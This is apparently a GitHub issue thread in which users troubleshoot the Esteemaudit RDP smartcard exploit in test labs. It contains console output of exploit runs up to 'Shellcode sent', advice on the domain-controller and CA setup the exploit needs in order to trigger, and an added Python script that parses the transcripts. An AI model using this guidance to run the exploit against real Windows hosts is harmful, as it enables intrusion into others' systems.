Open f4rb3r1o opened 7 years ago
Hi @liad1234, which OS is your target, and is it on a domain or not?
Hi, the OS is Windows XP Professional x64 Edition SP1, not on a domain.
@liad1234 The most rapid solution for testing the exploit is to virtualize two machines: a Windows Server edition from 2003 through 2012 R2 to act as domain controller, and a Windows Server 2003 or XP to act as target. The exploit works only in a domain infrastructure, because it needs a CA to validate the certificate inside the logon request for smartcard authentication, and that will create the callback needed to trigger the exploit. By default every domain controller applies a GPO that authorizes the target machine to log in with RDP smartcard logon.
Thank you very much. Do you maybe have any link that describes the vulnerability and the dependencies? (Sorry to bother.)
Hi,
I am experiencing the same Connection Timeout problems:
root@kali:/usr/share/esteemaudit# wine Esteemaudit-2.1.0.exe
[*] Creating callback socket
[+] Listening on 0.0.0.0:444
[+] Callback socket creation complete
[+] Connected to target 192.168.55.100:3389
[+] Sending Space Bar
[*] Building exploit buffer.
[+] Exploit buffer created.
[+] Sending Enter key
[+] SELECT_FILE - GPK Card MF
[+] GET_RESPONSE - data unit size
[+] GET_RESPONSE - serial number
[+] SELECT_FILE - GPK Card MF
[+] SELECT_FILE - Don't care which
[+] GET_RESPONSE - from SELECT_FILE
[+] READ_BINARY - unknown offset
[+] SELECT_FILE - Don't care which
[+] GET_RESPONSE - from SELECT_FILE
[+] READ_BINARY - start of file
[+] Shellcode sent
[+] SELECT_FILE - GPK Card MF
[*] First stage complete
[-] Connection timeout (exceeded computed threshold of 10.00 seconds)
[-] Exploit NOT successful :-(
My scenario is:
The victim is accessible using RDP with an administrator account.
It is a really interesting lab to work with this exploit. Well done!
Thanks a lot, and I am looking forward to your news.
Hi friend, well done on the effort! I have a little problem. After looking at most of the issues and trying to solve it myself, I decided to write to you. After following the whole process and debugging and fixing some problems myself, I'm getting this message: [-] 10.0.0.42:3389 - The machine is not vulnerable! When going to the containing folder and executing wine Esteemaudit-2.1.0.exe I'm getting:
[*] Creating callback socket
[+] Listening on 0.0.0.0:0
[+] Callback socket creation complete
[+] Connected to target 10.0.0.42:3389
[+] Sending Space Bar
[-] Connection timeout (exceeded computed threshold of 10.00 seconds)
[-] Exploit NOT successful :-(
Please help. Regards.
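The two console transcripts in this thread stop at very different points: the first reaches the smartcard APDU exchange and "First stage complete" before timing out, the second times out right after "Sending Space Bar", which matches the earlier explanation that the smartcard logon path is only exercised on a domain-joined target. Below is an added Python example, written for this page and not part of the Esteemaudit tool or of anyone's post here, that splits a pasted transcript (the issue tracker tends to run the lines together) into its tagged entries and reports the last stage reached, how many smartcard APDU steps were logged, the callback listener port and the failure lines. The sample transcripts are constructed from the two pasted in this thread; the stage names and the reading of the "Listening on 0.0.0.0:0" port are my own assumptions, not the tool's documented semantics.

```python
import re

# Constructed from the two transcripts pasted in this thread. Markdown had
# swallowed the asterisk in "[*]" in the first one; it is restored here.
RUN_DOMAIN_LAB = (
    "[*] Creating callback socket [+] Listening on 0.0.0.0:444 "
    "[+] Callback socket creation complete [+] Connected to target 192.168.55.100:3389 "
    "[+] Sending Space Bar [*] Building exploit buffer. [+] Exploit buffer created. "
    "[+] Sending Enter key [+] SELECT_FILE - GPK Card MF [+] GET_RESPONSE - data unit size "
    "[+] GET_RESPONSE - serial number [+] SELECT_FILE - GPK Card MF "
    "[+] SELECT_FILE - Don't care which [+] GET_RESPONSE - from SELECT_FILE "
    "[+] READ_BINARY - unknown offset [+] SELECT_FILE - Don't care which "
    "[+] GET_RESPONSE - from SELECT_FILE [+] READ_BINARY - start of file "
    "[+] Shellcode sent [+] SELECT_FILE - GPK Card MF [*] First stage complete "
    "[-] Connection timeout (exceeded computed threshold of 10.00 seconds) "
    "[-] Exploit NOT successful :-("
)
RUN_WORKGROUP = (
    "[*] Creating callback socket [+] Listening on 0.0.0.0:0 "
    "[+] Callback socket creation complete [+] Connected to target 10.0.0.42:3389 "
    "[+] Sending Space Bar [-] Connection timeout (exceeded computed threshold of 10.00 seconds) "
    "[-] Exploit NOT successful :-("
)

# Each entry is "[x] message" where x is * (info), + (success) or - (failure).
# The lazy match runs until the next marker or the end of the text, so it
# works whether the transcript is one line per entry or all on one line.
ENTRY_RE = re.compile(r"\[([*+\-])\]\s*(.*?)(?=\s*\[[*+\-]\]|$)", re.S)
APDU_PREFIXES = ("SELECT_FILE", "GET_RESPONSE", "READ_BINARY")


def parse_transcript(text):
    """Return a list of (tag, message) tuples in transcript order."""
    return [(m.group(1), m.group(2).strip()) for m in ENTRY_RE.finditer(text)]


def last_stage(entries):
    """Name of the furthest stage reached before the first failure line.
    Stage names are this example's own labels (assumption), derived from the
    message prefixes visible in the thread's transcripts."""
    stage = "not started"
    for tag, msg in entries:
        if tag == "-":
            break
        if msg.startswith("Listening on"):
            stage = "listener up"
        elif msg.startswith("Connected to target"):
            stage = "connected"
        elif msg.startswith("Sending"):
            stage = "keyboard input sent"
        elif msg.startswith(APDU_PREFIXES):
            stage = "smartcard exchange"
        elif msg.startswith("Shellcode sent"):
            stage = "shellcode sent"
        elif msg.startswith("First stage complete"):
            stage = "first stage complete"
    return stage


def triage(text):
    """Summarise one transcript: where it stopped and what it reported."""
    entries = parse_transcript(text)
    port = re.search(r"Listening on \S+:(\d+)", text)
    target = re.search(r"Connected to target (\S+)", text)
    return {
        "last_stage": last_stage(entries),
        # Count of smartcard APDU steps; zero means the target never entered
        # the smartcard logon exchange, which the thread ties to non-domain hosts.
        "smartcard_apdus": sum(1 for _, m in entries if m.startswith(APDU_PREFIXES)),
        # Port 0 here is read (assumption) as "no callback port was configured".
        "listener_port": int(port.group(1)) if port else None,
        "target": target.group(1) if target else None,
        "failures": [m for t, m in entries if t == "-"],
    }


if __name__ == "__main__":
    for name, run in (("domain lab", RUN_DOMAIN_LAB), ("workgroup host", RUN_WORKGROUP)):
        print(name, triage(run))
```

Running it on the two constructed transcripts shows the domain-lab run reaching "first stage complete" with eleven APDU steps logged and a listener on port 444, while the workgroup run stops at "keyboard input sent" with no APDU steps and a listener on port 0, which is the contrast the earlier reply describes.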